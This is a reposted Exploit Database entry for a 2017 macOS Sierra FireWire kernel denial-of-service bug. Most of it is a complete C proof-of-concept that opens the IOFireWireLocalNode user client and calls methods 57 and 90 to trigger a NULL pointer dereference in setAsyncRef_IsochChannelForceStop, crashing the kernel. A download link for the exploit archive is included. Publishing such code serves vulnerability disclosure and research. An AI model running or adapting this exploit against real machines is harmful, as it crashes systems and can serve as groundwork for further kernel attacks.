Apple macOS Sierra 10.12.3 – ‘IOFireWireFamily-null-deref’ FireWire Port Denial of Service

• Exploit Database
• 153 阅读

• 作者： Brandon Azad
  日期： 2017-08-16
• 类别：

  • dos
  平台：

  • macos
• 来源：https://www.exploit-db.com/exploits/44236/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52

  /* * IOFireWireFamily-null-deref.c * Brandon Azad * * NULL pointer dereference in IOFireWireUserClient::setAsyncRef_IsochChannelForceStop. * * Download: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/44236.zip */     #include <IOKit/IOKitLib.h>   int main() { int ret = 0; io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOFireWireLocalNode")); if (service == IO_OBJECT_NULL) { ret = 1; goto fail1; } io_connect_t connect; kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &connect); IOObjectRelease(service); if (kr != KERN_SUCCESS) { ret = 2; goto fail1; } // isochChannel_Create uint64_t args[3] = { 0, 0x100, 0x100 }; uint64_t handle = 0; uint32_t output_count = 1; kr = IOConnectCallMethod(connect, 57, args, sizeof(args) / sizeof(*args), NULL, 0, &handle, &output_count, NULL, NULL); if (kr != KERN_SUCCESS) { ret = 3; goto fail2; } // setAsyncRef_IsochChannelForceStop kr = IOConnectCallMethod(connect, 90, &handle, 1, NULL, 0, NULL, NULL, NULL, NULL); if (kr != KERN_SUCCESS) { ret = 4; goto fail2; } fail2: IOServiceClose(connect); fail1: return ret; }